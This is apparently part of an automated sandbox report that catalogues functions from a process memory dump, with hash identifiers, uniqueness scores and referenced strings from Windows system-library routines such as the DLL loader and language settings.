                                                                    • Instruction ID: 98edc5b2b5f0697d0876dfbb3a464cfbf67b368cca4deb9dad27d1426b7d5047
                                                                    • Opcode Fuzzy Hash: 708794a274b77b7c3bd3fe8bc3733db4d3813bcd78371034b2a8a2801049d933
                                                                    • Instruction Fuzzy Hash: 7191D171A003169FEF28DF59D881ABEB7B9FF84314B184569DA05AF241EB30E911CBD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 015B98A2
                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 015B9891
                                                                    • LdrpCompleteMapModule, xrefs: 015B9898
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                    • API String ID: 0-1676968949
                                                                    • Opcode ID: 6d2dc8ea491239f2e4ef896ecd1cbf6cb66b88759a883da4e12930aef0ab98a3
                                                                    • Instruction ID: 5a724c6a369a16b9700c5f3db320486cfee0a2bd932691022a659bb5c60ef26d
                                                                    • Opcode Fuzzy Hash: 6d2dc8ea491239f2e4ef896ecd1cbf6cb66b88759a883da4e12930aef0ab98a3
                                                                    • Instruction Fuzzy Hash: 6051DF716007469FE722CB6CCD84B6ABBE8BB48718F040559EA519F3D1D734ED04CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0155E68C
                                                                    • @, xrefs: 0155E6C0
                                                                    • InstallLanguageFallback, xrefs: 0155E6DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                    • API String ID: 0-1757540487
                                                                    • Opcode ID: ae0b83a56710b7b0fe6bcabbd3ba6fb2b036021a970993a464aba19ee8db5041
                                                                    • Instruction ID: 931f9ea04e8aa83060b0e4af65ec2e3e52b67b8b633da1de7e7d17ceac5a6f6a
                                                                    • Opcode Fuzzy Hash: ae0b83a56710b7b0fe6bcabbd3ba6fb2b036021a970993a464aba19ee8db5041
                                                                    • Instruction Fuzzy Hash: 835180726143469BD718DF68C490AAFB7E9FF88615F05092EF985DB240F734DA04C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction ID: dd537ad90a1dfd2938b0062c7fe287c8cbce9b1993b447ea9b63b260fcbbfb22
                                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction Fuzzy Hash: F49181316043429FE725CE69CD41B2BBBE6BF84714F18892DFA95CB284E775E804CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: 2c48fa2a65ff8c66a160f10162ca698a09ed485c0b9d6f839f96e9782af6fcd3
                                                                    • Instruction ID: c11dba09c8f1876ce06260783be3b807ab849e39e051133ed127404a20c52f87
                                                                    • Opcode Fuzzy Hash: 2c48fa2a65ff8c66a160f10162ca698a09ed485c0b9d6f839f96e9782af6fcd3
                                                                    • Instruction Fuzzy Hash: 34516C71A106099FDB25DFACC880AAEBBF8FF98700F14442DE649EF251EA71D904CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0157B9A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 885266447-0
                                                                    • Opcode ID: 798c6511baef30c85adfee6aad12a33545130af4099b47c0f4b2725fc5c76734
                                                                    • Instruction ID: 630df433ac689382e0dc74c08a0bfc0e1e54230c9a7c1ce432da184744ec4ddf
                                                                    • Opcode Fuzzy Hash: 798c6511baef30c85adfee6aad12a33545130af4099b47c0f4b2725fc5c76734
                                                                    • Instruction Fuzzy Hash: 84515871A08301CFC721EF69D48192BBBF9FB88600F14896EF9998B355D771E844CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _vswprintf_s
                                                                    • String ID:
                                                                    • API String ID: 677850445-0
                                                                    • Opcode ID: 1a10a1cbf7751d365f8e4caa74f9afc18e5c0ef90ce373fbced315123eefcf45
                                                                    • Instruction ID: 4d87ef5138041c1e06c003c5ec4a9d6ae6c16fa96a4f87ce476e96477dad15a3
                                                                    • Opcode Fuzzy Hash: 1a10a1cbf7751d365f8e4caa74f9afc18e5c0ef90ce373fbced315123eefcf45
                                                                    • Instruction Fuzzy Hash: 8E51BF71D0026A8EEF35CF688895BFEBBB1BF44710F1041A9E85AAF282D7754941CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    • Opcode ID: 9fc4ed6842757302c989115f230d88fa724a35e457595989ea9f06bc07429092
                                                                    • Instruction ID: a80b66d53ba450411701cdb7e5e692a47c2cbe196265cf265050807d4ea09b61
                                                                    • Opcode Fuzzy Hash: 9fc4ed6842757302c989115f230d88fa724a35e457595989ea9f06bc07429092
                                                                    • Instruction Fuzzy Hash: EFC18E75E1021ADFDB25EF99D881AAEBBB5FF48740F444429E901FF250E734A941CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 015CBE0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                    • API String ID: 0-865735534
                                                                    • Opcode ID: bbaf9bf7ece397d1ce58211e1ccb905882af671da2b467523ca1e3c5ac35f02a
                                                                    • Instruction ID: c645528e17ec5d32d764d5034cb93d9aadc58027d7bcdeb36cb1ebcaea17cb8e
                                                                    • Opcode Fuzzy Hash: bbaf9bf7ece397d1ce58211e1ccb905882af671da2b467523ca1e3c5ac35f02a
                                                                    • Instruction Fuzzy Hash: B1A1E271B046068FEB25EFA8C851B7EB7A4BB48B50F04456EDA46EF680DB30D941CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Re-Waiting
                                                                    • API String ID: 0-316354757
                                                                    • Opcode ID: a8b63c30cb793f0f850b9cc3e45300799da82e462c6696eaed9bd3f3f5b4f2a5
                                                                    • Instruction ID: 16965b9b1a22010cfe1be0af146eb8ba6071fb318f3e3b3d5eed4549e9b5f6f9
                                                                    • Opcode Fuzzy Hash: a8b63c30cb793f0f850b9cc3e45300799da82e462c6696eaed9bd3f3f5b4f2a5
                                                                    • Instruction Fuzzy Hash: 01612131A40646DFEB22DF6CC8A4BBE7BE4FB84314F58066BD9119F2C1C770A9018791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 90dc8296188e2d0fd3f3a57f16b6eea409207a35319bea930c79e79b100d3aae
                                                                    • Instruction ID: 7d2e54489a0a791bd49047652bafc380943548eb1abcd596744f1b202c607603
                                                                    • Opcode Fuzzy Hash: 90dc8296188e2d0fd3f3a57f16b6eea409207a35319bea930c79e79b100d3aae
                                                                    • Instruction Fuzzy Hash: 2F519C713087829FD325DF28DC84B1BBBE5EBC5604F04092CFA8697290DB74E806CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction ID: 4a324c852ad95cdfb6ede84866203cbea4296a00d845919d40c3802c1b99b447
                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction Fuzzy Hash: 21519E71504712AFC320DF59C841A6BBBF8FF98750F00892EFA959B690E7B4E904CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: 04665e9cea86598e17d98e9d5f1f9789e05da0a8b7083d1295701a616b44d096
                                                                    • Instruction ID: 493009f0f2dc365387088332538063f73a41edbd90512fa9311d7584f75f537b
                                                                    • Opcode Fuzzy Hash: 04665e9cea86598e17d98e9d5f1f9789e05da0a8b7083d1295701a616b44d096
                                                                    • Instruction Fuzzy Hash: 764143F1D0052E9BDF219A54CC80FAEB77CBB44714F0045A5AA09AF240DB709E88CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction ID: f63df9dad005f6215f6f27a6174c808b2f122c55aa0a3302ece56c4d00701730
                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction Fuzzy Hash: 9631F1322047666BE720DE28CD85F9B7BE9EBC4754F144229FA58EB280D770E904CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: 64c1bdf49b8aaa292c0f633f5869b021da32bbd5ed1d49ecd3f0a920d61b8600
                                                                    • Instruction ID: 9f44978c81f7ffe4b208121c75aff5cf8786c181f80bd0a102af760402d83643
                                                                    • Opcode Fuzzy Hash: 64c1bdf49b8aaa292c0f633f5869b021da32bbd5ed1d49ecd3f0a920d61b8600
                                                                    • Instruction Fuzzy Hash: D131C3B6D0151AAFEB25DF5CC945E6FBBB4FB80B20F014169E915AF291D7309E00C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 0dc67938e7927ddfb1d4f93b2a8707db9a1506cf7fcab31b86cfb7623143188b
                                                                    • Instruction ID: f406ee5626e8a43035b9c81336a4874017bffe8822043a4a9001e7a3673f3e0a
                                                                    • Opcode Fuzzy Hash: 0dc67938e7927ddfb1d4f93b2a8707db9a1506cf7fcab31b86cfb7623143188b
                                                                    • Instruction Fuzzy Hash: E331C1B15083069FC711EF68D88196FBBF8FBD5654F00092EF994AB290DA34DD05CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: WindowsExcludedProcs
                                                                    • API String ID: 0-3583428290
                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction ID: 9a9dade2ed9a6672610cabc2fd5043b3e7f46906bd236a86c6a49cc7c6b9d457
                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction Fuzzy Hash: 2321F876501919ABEB229A59C8C0FBFBBADBFC4650F154426FA048F204D630DC009BE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx
                                                                    • API String ID: 0-89312691
                                                                    • Opcode ID: 65a2e2b77fe37ce7dc3582ba54c3aaa0601b5f6acdbdec452843be9dfb128c67
                                                                    • Instruction ID: 11fc16d856edee3475162fb783f756bb03af1e099bc4b2e014b1263ec306cdec
                                                                    • Opcode Fuzzy Hash: 65a2e2b77fe37ce7dc3582ba54c3aaa0601b5f6acdbdec452843be9dfb128c67
                                                                    • Instruction Fuzzy Hash: BD11B2353086028BEB25CE1DB89373AF6D5BB85624F24492BE571CF391DB70D8418780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • Critical error detected %lx, xrefs: 01608E21
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Critical error detected %lx
                                                                    • API String ID: 0-802127002
                                                                    • Opcode ID: 34d4474ab69fd9785a9698feed1aaf9d943ba6fc51b4c0178fa1c6f8379cebb6
                                                                    • Instruction ID: e4fc0577c5bc83909a85b81dec8ecf91b53bec582b129df005c88799fa53350c
                                                                    • Opcode Fuzzy Hash: 34d4474ab69fd9785a9698feed1aaf9d943ba6fc51b4c0178fa1c6f8379cebb6
                                                                    • Instruction Fuzzy Hash: C21175B5D90349DADB2ADFA8890579EBBB4BB54314F20421EE529AB382C3340A02CF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 015EFF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 0-1911121157
                                                                    • Opcode ID: 5aa4c349686f68c3195ac67e673b746e7c2ee564b133d916d5b16dac96ee9a80
                                                                    • Instruction ID: d9f36ea17fba7ac3231e49508718d5bd0d0d1faab0421f5bdc0493c1a5c40c7d
                                                                    • Opcode Fuzzy Hash: 5aa4c349686f68c3195ac67e673b746e7c2ee564b133d916d5b16dac96ee9a80
                                                                    • Instruction Fuzzy Hash: FA11ED75950145EFDB2AEF94CC48F9CBBF2FB48704F548054E5186F6A1CB389950CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a19715b380de6d4e08f5b74901b0d675e4b29735b0e59dd54f353dee132c50ae
                                                                    • Instruction ID: cabd73b2bd45a4a401d9e455bc0029a5e5035297086a6295e9a620c000e76474
                                                                    • Opcode Fuzzy Hash: a19715b380de6d4e08f5b74901b0d675e4b29735b0e59dd54f353dee132c50ae
                                                                    • Instruction Fuzzy Hash: F342287590066A8FDB24CF68CD80BA9BBB1FF49304F1481AAD949EB342E7749985CF50
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c400e03204b8f9c6141c639f8263f72fcdaa82832303ca2cb956f4acc0881591
                                                                    • Instruction ID: e52e4ee2eff39f65b64f606b2eacad18a824df35952fa7faa6f67316f18e6a4c
                                                                    • Opcode Fuzzy Hash: c400e03204b8f9c6141c639f8263f72fcdaa82832303ca2cb956f4acc0881591
                                                                    • Instruction Fuzzy Hash: F3F16C706082528FD724CF19D482ABAB7E2FF98714F19492EF986CF250E734D891CB52
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6959aaab83deeabe4256a4d127abb924d47ee0ca3334cd3f72e488b96f1e710
                                                                    • Instruction ID: 4e0f5e023b37ff9026273f62257a69f030595366465425510e473590e6b7834e
                                                                    • Opcode Fuzzy Hash: e6959aaab83deeabe4256a4d127abb924d47ee0ca3334cd3f72e488b96f1e710
                                                                    • Instruction Fuzzy Hash: 9CF1E4356083029FD726DFACC84076E7BE5BB86714F14891DE999AF281E774E841CB82
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d5ecc5966a850f823104e1cd172ff9e5a9027dad6f19e0c26d4ca67867f613c
                                                                    • Instruction ID: 814d6b77042a44213f1f0e4ca6dd573f8da6aa03d2d7b75b2f50754d5ce025af
                                                                    • Opcode Fuzzy Hash: 2d5ecc5966a850f823104e1cd172ff9e5a9027dad6f19e0c26d4ca67867f613c
                                                                    • Instruction Fuzzy Hash: 22E1C034B0125ACFEB25CF68CC84BADB7BABF85304F040599D9499F291D774AD81CB92
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50b70be8dc91579271c046cf0b774ec1359c749b62690297a4d95d8d5e08ac8e
                                                                    • Instruction ID: 47a80dd6402ae169c47626ef73995aeee3910a43cd5191a28c10df01a89818ff
                                                                    • Opcode Fuzzy Hash: 50b70be8dc91579271c046cf0b774ec1359c749b62690297a4d95d8d5e08ac8e
                                                                    • Instruction Fuzzy Hash: 41B15CB4E0034ADFDB25DFA9C984AADBBB9FF98304F10452AE505AF245D770AD41CB90
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b05ea498d0b9bf4029cff9144bcc83935fc293aff4cc7929efc8e4102150e00a
                                                                    • Instruction ID: e7c2293fb295d8046c959fc2679289e6855682e91ff69254deadcb2ada4900fb
                                                                    • Opcode Fuzzy Hash: b05ea498d0b9bf4029cff9144bcc83935fc293aff4cc7929efc8e4102150e00a
                                                                    • Instruction Fuzzy Hash: B4C121755083818FD354CF68C480A6AFBF1BF88704F184A6EF99A9B352D770E985CB42
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e2b2bfa68131d8106931e0a29225f1bdfcba0fa3f3f39280459dec87a5af647
                                                                    • Instruction ID: 1173504a42cffcca8aab857d46d1fac19f6cc52827bcc3e6735e74ea89bfb846
                                                                    • Opcode Fuzzy Hash: 3e2b2bfa68131d8106931e0a29225f1bdfcba0fa3f3f39280459dec87a5af647
                                                                    • Instruction Fuzzy Hash: 1F91F431E002169FEB31AAACC854FAD7BA4BB45B24F050269FA11BF2E1D7749C44C7A1
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad179ea1f52002263bf2d710ed1eb37d0d5d4b10319001a6752c38c148445bd1
                                                                    • Instruction ID: a80bfa5f7113672347cf745c4fe5d826aa8fc95755564395c2a106b52a45847e
                                                                    • Opcode Fuzzy Hash: ad179ea1f52002263bf2d710ed1eb37d0d5d4b10319001a6752c38c148445bd1
                                                                    • Instruction Fuzzy Hash: A78182756042029FDB26CE98C880A6E77E9FB88B54F14485EEE459F641E330ED41CFA2
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 412b02bb752585f2e5a5f2264fc4463fc9d572b337bf442e93bf2240a87fceaa
                                                                    • Instruction ID: 710390ad31c6679f59f21acd8c7c8364cd3b1f545d6159a41bfb60b90b7c5ac5
                                                                    • Opcode Fuzzy Hash: 412b02bb752585f2e5a5f2264fc4463fc9d572b337bf442e93bf2240a87fceaa
                                                                    • Instruction Fuzzy Hash: 2E71F472A00702EFDB3A9F18C849F5ABBE5FF84712F144528E6559F2A0DBB1E941CB50
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                    • Instruction ID: 6394cd075d92681c172e35ccc98500c110d2da98c2298ea375897b562cbc2ce0
                                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                    • Instruction Fuzzy Hash: C2716071A0061AEFDB20DFA9D944EEEBBB9FF88714F104469E505EB250D734EA41CB90
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: beb9ea9a00f776a49a7cd945ebb674353ec9219ad337223b89d01b505f6ef16c
                                                                    • Instruction ID: 6caeb93c82ba748ed7f114c64b00f5d279e4da10343efc578272c6cbbfac5cba
                                                                    • Opcode Fuzzy Hash: beb9ea9a00f776a49a7cd945ebb674353ec9219ad337223b89d01b505f6ef16c
                                                                    • Instruction Fuzzy Hash: D551AB71205342AFD721EF68C841B2BBBE8FF94710F14091EF8958B691E770E805C792
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5f465ff07e3fec81bd065df6c93eec2fcd8961efcc3171915fe23df4a8c790a9
                                                                    • Instruction ID: 78b6fc6b28826547fc531331c95a5d173af677bc100198cd8a2da95772a5dfbd
                                                                    • Opcode Fuzzy Hash: 5f465ff07e3fec81bd065df6c93eec2fcd8961efcc3171915fe23df4a8c790a9
                                                                    • Instruction Fuzzy Hash: 9251B17AB011158FCB18EF5CC8909BDBBF1FB88701B16845AE846AF315E730AA51CB90
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a36c84a131df41cc2826c06e5892cea4ca102fa434cf28533bc862b0e0bd7b20
                                                                    • Instruction ID: 6dff64b9ebacf2bdfcc065347310c33446666d05c8e33d78c84c7d2680fdb453
                                                                    • Opcode Fuzzy Hash: a36c84a131df41cc2826c06e5892cea4ca102fa434cf28533bc862b0e0bd7b20
                                                                    • Instruction Fuzzy Hash: AF41D2B17022919FD7268AADCC94B3BBB9AEF84620F0C4219F916C73D8DB34D801D691
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e417cd68a9c799501a29199db1bbcd2d768a8a91a552dd6d8dbda969167db5b
                                                                    • Instruction ID: 4de6a50ef127dd53bfcbfb8607e91a26c3e792a300a4f545750efa725ea00c1e
                                                                    • Opcode Fuzzy Hash: 3e417cd68a9c799501a29199db1bbcd2d768a8a91a552dd6d8dbda969167db5b
                                                                    • Instruction Fuzzy Hash: 7651CE75A00616CFCB14CFECD891AAEFBF5BF88350F20855AD955AB340EB70A944CB90
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                    • Instruction ID: a49bc1cd894d4225a155afcd6b4adb23e0d56d1ab367833dea3a161b3b7bd5f5
                                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                    • Instruction Fuzzy Hash: B8510130E05245EBEB21CB68D0E17AEFBF5FF05324F2881A9C5565B282C375A989C7C1
                                                                    Uniqueness
                                                                    • Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                    • Instruction ID: 6b96ad97277460c6bf9b4a76bc924600e0333d8ca65e95524dbac660cac40892
                                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                    • Instruction Fuzzy Hash: C7517C71600A46EFDB16CF18D880E96FBB5FF55304F1481AAE9089F212E771EA46CF90
                                                                    Uniqueness
